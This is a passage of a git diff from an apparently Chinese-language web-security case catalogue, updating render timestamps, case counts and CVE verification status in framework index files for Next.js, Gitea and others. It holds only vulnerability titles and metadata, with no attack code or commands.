 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/ecommerce/medusa/INDEX.md b/07-framework-security/ecommerce/medusa/INDEX.md
index a35c4eed..a2fdb597 100644
--- a/07-framework-security/ecommerce/medusa/INDEX.md
+++ b/07-framework-security/ecommerce/medusa/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/ecommerce/opencart/INDEX.md b/07-framework-security/ecommerce/opencart/INDEX.md
index 13094390..9f8421ef 100644
--- a/07-framework-security/ecommerce/opencart/INDEX.md
+++ b/07-framework-security/ecommerce/opencart/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/ecommerce/openmage/INDEX.md b/07-framework-security/ecommerce/openmage/INDEX.md
index 62f16004..b10992e3 100644
--- a/07-framework-security/ecommerce/openmage/INDEX.md
+++ b/07-framework-security/ecommerce/openmage/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/ecommerce/prestashop/INDEX.md b/07-framework-security/ecommerce/prestashop/INDEX.md
index bb4b7ad7..b11adfa2 100644
--- a/07-framework-security/ecommerce/prestashop/INDEX.md
+++ b/07-framework-security/ecommerce/prestashop/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/ecommerce/saleor/INDEX.md b/07-framework-security/ecommerce/saleor/INDEX.md
index 142d08a3..d932d0a9 100644
--- a/07-framework-security/ecommerce/saleor/INDEX.md
+++ b/07-framework-security/ecommerce/saleor/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/ecommerce/shopware/INDEX.md b/07-framework-security/ecommerce/shopware/INDEX.md
index 0a8070f4..dfabb001 100644
--- a/07-framework-security/ecommerce/shopware/INDEX.md
+++ b/07-framework-security/ecommerce/shopware/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/ecommerce/woocommerce/INDEX.md b/07-framework-security/ecommerce/woocommerce/INDEX.md
index fb36c876..c9a508e4 100644
--- a/07-framework-security/ecommerce/woocommerce/INDEX.md
+++ b/07-framework-security/ecommerce/woocommerce/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/angular/INDEX.md b/07-framework-security/frameworks/angular/INDEX.md
index d479c7a6..af9a1964 100644
--- a/07-framework-security/frameworks/angular/INDEX.md
+++ b/07-framework-security/frameworks/angular/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:13+00:00`
+- 最近渲染时间: `2026-03-18T01:29:35+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/aspnet-core/INDEX.md b/07-framework-security/frameworks/aspnet-core/INDEX.md
index eac0c846..439d1b7e 100644
--- a/07-framework-security/frameworks/aspnet-core/INDEX.md
+++ b/07-framework-security/frameworks/aspnet-core/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/astro/INDEX.md b/07-framework-security/frameworks/astro/INDEX.md
index 6c941016..56c24d41 100644
--- a/07-framework-security/frameworks/astro/INDEX.md
+++ b/07-framework-security/frameworks/astro/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:13+00:00`
+- 最近渲染时间: `2026-03-18T01:29:35+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/django/INDEX.md b/07-framework-security/frameworks/django/INDEX.md
index cfba56e9..6fa96a70 100644
--- a/07-framework-security/frameworks/django/INDEX.md
+++ b/07-framework-security/frameworks/django/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/echo/INDEX.md b/07-framework-security/frameworks/echo/INDEX.md
index 98e5a78a..32442e04 100644
--- a/07-framework-security/frameworks/echo/INDEX.md
+++ b/07-framework-security/frameworks/echo/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/esbuild/INDEX.md b/07-framework-security/frameworks/esbuild/INDEX.md
index 9d8464ff..e660a7a4 100644
--- a/07-framework-security/frameworks/esbuild/INDEX.md
+++ b/07-framework-security/frameworks/esbuild/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/express/INDEX.md b/07-framework-security/frameworks/express/INDEX.md
index 79acc306..af050760 100644
--- a/07-framework-security/frameworks/express/INDEX.md
+++ b/07-framework-security/frameworks/express/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:13+00:00`
+- 最近渲染时间: `2026-03-18T01:29:35+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/fastify/INDEX.md b/07-framework-security/frameworks/fastify/INDEX.md
index b8fff497..6f7168d5 100644
--- a/07-framework-security/frameworks/fastify/INDEX.md
+++ b/07-framework-security/frameworks/fastify/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:13+00:00`
+- 最近渲染时间: `2026-03-18T01:29:35+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/flask/INDEX.md b/07-framework-security/frameworks/flask/INDEX.md
index ec819902..69a464ba 100644
--- a/07-framework-security/frameworks/flask/INDEX.md
+++ b/07-framework-security/frameworks/flask/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/gin/INDEX.md b/07-framework-security/frameworks/gin/INDEX.md
index 82e5ced1..9c03fe8d 100644
--- a/07-framework-security/frameworks/gin/INDEX.md
+++ b/07-framework-security/frameworks/gin/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/hapi/INDEX.md b/07-framework-security/frameworks/hapi/INDEX.md
index 14649013..74e95ee2 100644
--- a/07-framework-security/frameworks/hapi/INDEX.md
+++ b/07-framework-security/frameworks/hapi/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:13+00:00`
+- 最近渲染时间: `2026-03-18T01:29:35+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/koa/INDEX.md b/07-framework-security/frameworks/koa/INDEX.md
index 4d0374eb..6e508c79 100644
--- a/07-framework-security/frameworks/koa/INDEX.md
+++ b/07-framework-security/frameworks/koa/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:13+00:00`
+- 最近渲染时间: `2026-03-18T01:29:35+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/laravel/INDEX.md b/07-framework-security/frameworks/laravel/INDEX.md
index 6e6ca7ac..3b8c4088 100644
--- a/07-framework-security/frameworks/laravel/INDEX.md
+++ b/07-framework-security/frameworks/laravel/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/nestjs/INDEX.md b/07-framework-security/frameworks/nestjs/INDEX.md
index 44a059a3..35bb6cb9 100644
--- a/07-framework-security/frameworks/nestjs/INDEX.md
+++ b/07-framework-security/frameworks/nestjs/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:13+00:00`
+- 最近渲染时间: `2026-03-18T01:29:35+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/nextjs/INDEX.md b/07-framework-security/frameworks/nextjs/INDEX.md
index 5d040e3e..4f8cd749 100644
--- a/07-framework-security/frameworks/nextjs/INDEX.md
+++ b/07-framework-security/frameworks/nextjs/INDEX.md
@@ -5,14 +5,14 @@
 - 系统 ID: `nextjs`
 - 分类: `frameworks`
 - 覆盖策略: `history-full`
-- 总案例数: `26`
-- 近 30 天新增/更新: `5`
-- 重点 Markdown 案例数: `26`
-- 已实证(真实版本): `0`
+- 总案例数: `24`
+- 近 30 天新增/更新: `3`
+- 重点 Markdown 案例数: `24`
+- 已实证(真实版本): `1`
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
-- 待人工/缺浏览器证据: `26`
-- 最近渲染时间: `2026-03-17T12:57:12+00:00`
+- 待人工/缺浏览器证据: `23`
+- 最近渲染时间: `2026-03-18T01:29:34+00:00`
 
 ## 目标约束
 
@@ -47,14 +47,12 @@
 | Information exposure in Next.js dev server due to lack of origin verification | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-06-13T14:41:21Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md) |
 | Next.js Race Condition to Cache Poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-26T17:48:29Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md) |
 | Next.js may leak x-middleware-subrequest-id to external hosts | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-10-13T15:35:50Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md) |
-| Authorization Bypass in Next.js Middleware | `low` | `generated` | `triage-manual` | `real` | `official` | `2026-03-04T15:06:29.993197Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md) |
 | Next.js Allows a Denial of Service (DoS) with Server Actions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:36:04.252972Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md) |
-| Next.js authorization bypass vulnerability | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-10T21:12:24Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md) |
+| Next.js authorization bypass vulnerability | `low` | `generated` | `verified-real` | `real` | `official` | `2025-09-10T21:12:24Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md) |
 | Denial of Service condition in Next.js image optimization | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:25:43.295558Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md) |
 | Next.js Cache Poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:45:33.402195Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md) |
 | Next.js Server-Side Request Forgery in Server Actions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:32:36.434669Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md) |
 | Unexpected server crash in Next.js. | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:36.554552Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md) |
 | XSS in Image Optimization API for Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:20.154452Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md) |
 | Open Redirect in Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:08.038285Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md) |
-| Open Redirect in Next.js versions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:14:13.665535Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md) |
 | Directory Traversal in Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-26T17:49:56Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md) |
diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md
index 50369c2c..052ebd1b 100644
--- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md
+++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md
@@ -8,10 +8,10 @@ updated_date: "2026-03-13T22:14:13.665535Z"
 severity: "low"
 exploit_status: "unknown"
 source_confidence: "official"
-verification_status: "triage-manual"
-verification_mode: "synthetic"
-artifact_mode: "synthetic"
-last_run_id: ""
+verification_status: "verified-real"
+verification_mode: "real"
+artifact_mode: "local-fixture"
+last_run_id: "nextjs-nextjs--CVE-2020-15242-20260318012830"
 target_types:
   - "lab-local"
   - "lab-public"
@@ -37,12 +37,12 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-x56p
 
 ## 本地实证状态
 
-- 实证状态: `triage-manual`
-- 实证方式: `synthetic`
-- Artifact 模式: `synthetic`
-- 最近运行: `-`
-- 浏览器证据: `missing`
-- Run Bundle: `-`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 最近运行: `nextjs-nextjs--CVE-2020-15242-20260318012830`
+- 浏览器证据: `present`
+- Run Bundle: `/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830`
 
 ## 事件层
 
diff --git a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md
index aa270f2d..e483c084 100644
--- a/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md
+++ b/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md
@@ -8,10 +8,10 @@ updated_date: "2025-09-10T21:12:24Z"
 severity: "low"
 exploit_status: "unknown"
 source_confidence: "official"
-verification_status: "triage-manual"
-verification_mode: "synthetic"
-artifact_mode: "synthetic"
-last_run_id: ""
+verification_status: "verified-real"
+verification_mode: "real"
+artifact_mode: "local-fixture"
+last_run_id: "nextjs-nextjs--CVE-2024-51479-20260318012913"
 target_types:
   - "lab-local"
   - "lab-public"
@@ -37,12 +37,12 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc
 
 ## 本地实证状态
 
-- 实证状态: `triage-manual`
-- 实证方式: `synthetic`
-- Artifact 模式: `synthetic`
-- 最近运行: `-`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 最近运行: `nextjs-nextjs--CVE-2024-51479-20260318012913`
 - 浏览器证据: `missing`
-- Run Bundle: `-`
+- Run Bundle: `/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913`
 
 ## 事件层
 
diff --git a/07-framework-security/frameworks/nodejs/INDEX.md b/07-framework-security/frameworks/nodejs/INDEX.md
index 81c35f66..37c8cf5c 100644
--- a/07-framework-security/frameworks/nodejs/INDEX.md
+++ b/07-framework-security/frameworks/nodejs/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:13+00:00`
+- 最近渲染时间: `2026-03-18T01:29:35+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/nuxt/INDEX.md b/07-framework-security/frameworks/nuxt/INDEX.md
index 8d828b28..b216e0f6 100644
--- a/07-framework-security/frameworks/nuxt/INDEX.md
+++ b/07-framework-security/frameworks/nuxt/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:12+00:00`
+- 最近渲染时间: `2026-03-18T01:29:34+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/rails/INDEX.md b/07-framework-security/frameworks/rails/INDEX.md
index 0e4b9f1b..e3dfd5da 100644
--- a/07-framework-security/frameworks/rails/INDEX.md
+++ b/07-framework-security/frameworks/rails/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/react/INDEX.md b/07-framework-security/frameworks/react/INDEX.md
index 23ae08e0..3505c204 100644
--- a/07-framework-security/frameworks/react/INDEX.md
+++ b/07-framework-security/frameworks/react/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/spring-boot/INDEX.md b/07-framework-security/frameworks/spring-boot/INDEX.md
index 8acfd89c..e35a1687 100644
--- a/07-framework-security/frameworks/spring-boot/INDEX.md
+++ b/07-framework-security/frameworks/spring-boot/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/spring-framework/INDEX.md b/07-framework-security/frameworks/spring-framework/INDEX.md
index 31130c74..20698e84 100644
--- a/07-framework-security/frameworks/spring-framework/INDEX.md
+++ b/07-framework-security/frameworks/spring-framework/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/spring-security/INDEX.md b/07-framework-security/frameworks/spring-security/INDEX.md
index f780ae34..f53b265f 100644
--- a/07-framework-security/frameworks/spring-security/INDEX.md
+++ b/07-framework-security/frameworks/spring-security/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/sveltekit/INDEX.md b/07-framework-security/frameworks/sveltekit/INDEX.md
index 1892777a..5693e19e 100644
--- a/07-framework-security/frameworks/sveltekit/INDEX.md
+++ b/07-framework-security/frameworks/sveltekit/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:13+00:00`
+- 最近渲染时间: `2026-03-18T01:29:35+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/symfony/INDEX.md b/07-framework-security/frameworks/symfony/INDEX.md
index 0b5ea2ae..5af95779 100644
--- a/07-framework-security/frameworks/symfony/INDEX.md
+++ b/07-framework-security/frameworks/symfony/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/undici/INDEX.md b/07-framework-security/frameworks/undici/INDEX.md
index c3b6b293..07e133b9 100644
--- a/07-framework-security/frameworks/undici/INDEX.md
+++ b/07-framework-security/frameworks/undici/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `14`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/vite/INDEX.md b/07-framework-security/frameworks/vite/INDEX.md
index e53f2530..acd413c7 100644
--- a/07-framework-security/frameworks/vite/INDEX.md
+++ b/07-framework-security/frameworks/vite/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `12`
-- 最近渲染时间: `2026-03-17T12:57:13+00:00`
+- 最近渲染时间: `2026-03-18T01:29:35+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/vue/INDEX.md b/07-framework-security/frameworks/vue/INDEX.md
index 1633081e..e06e17eb 100644
--- a/07-framework-security/frameworks/vue/INDEX.md
+++ b/07-framework-security/frameworks/vue/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:12+00:00`
+- 最近渲染时间: `2026-03-18T01:29:34+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/webpack/INDEX.md b/07-framework-security/frameworks/webpack/INDEX.md
index 621103d6..3c9971c2 100644
--- a/07-framework-security/frameworks/webpack/INDEX.md
+++ b/07-framework-security/frameworks/webpack/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/frameworks/werkzeug/INDEX.md b/07-framework-security/frameworks/werkzeug/INDEX.md
index a305fe24..87ee8b5d 100644
--- a/07-framework-security/frameworks/werkzeug/INDEX.md
+++ b/07-framework-security/frameworks/werkzeug/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/platforms/adminer/INDEX.md b/07-framework-security/platforms/adminer/INDEX.md
index 07035624..f1e0c546 100644
--- a/07-framework-security/platforms/adminer/INDEX.md
+++ b/07-framework-security/platforms/adminer/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:14+00:00`
+- 最近渲染时间: `2026-03-18T01:29:36+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/platforms/gitea/INDEX.md b/07-framework-security/platforms/gitea/INDEX.md
index fbe33bff..b884c31a 100644
--- a/07-framework-security/platforms/gitea/INDEX.md
+++ b/07-framework-security/platforms/gitea/INDEX.md
@@ -5,14 +5,14 @@
 - 系统 ID: `gitea`
 - 分类: `platforms`
 - 覆盖策略: `rolling-24m`
-- 总案例数: `37`
-- 近 30 天新增/更新: `37`
-- 重点 Markdown 案例数: `37`
+- 总案例数: `30`
+- 近 30 天新增/更新: `30`
+- 重点 Markdown 案例数: `30`
 - 已实证(真实版本): `0`
 - 已实证(synthetic): `0`
-- 阻塞数: `1`
-- 待人工/缺浏览器证据: `36`
-- 最近渲染时间: `2026-03-17T12:57:16+00:00`
+- 阻塞数: `0`
+- 待人工/缺浏览器证据: `30`
+- 最近渲染时间: `2026-03-18T01:29:38+00:00`
 
 ## 目标约束
 
@@ -42,8 +42,6 @@
 | Gitea does not properly validate repository ownership when linking attachments to releases in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:55.747880Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20912.md) |
 | Gitea's /api/v1/user endpoint has different responses for failed authentication depending on whether a username exists in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:49.801641Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-69413.md) |
 | Gitea mishandles authorization for deletion of releases in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:49.095775Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68938.md) |
-| Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea | `unknown` | `generated` | `blocked-artifact` | `real` | `official` | `2026-03-03T04:57:48.777563Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68939.md) |
-| Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:50.087298Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md) |
 | Gitea mishandles access to a private resource upon receiving an API token with scope limited to public resources in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:50.339953Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68941.md) |
 | Gitea allows XSS because the search input box (for creating tags and branches) is v-html instead of v-text in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:49.781753Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68942.md) |
 | Gitea inadvertently discloses users' login times by allowing (for example) the lastlogintime explore/users sort order in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:49.213758Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68943.md) |
@@ -52,9 +50,6 @@
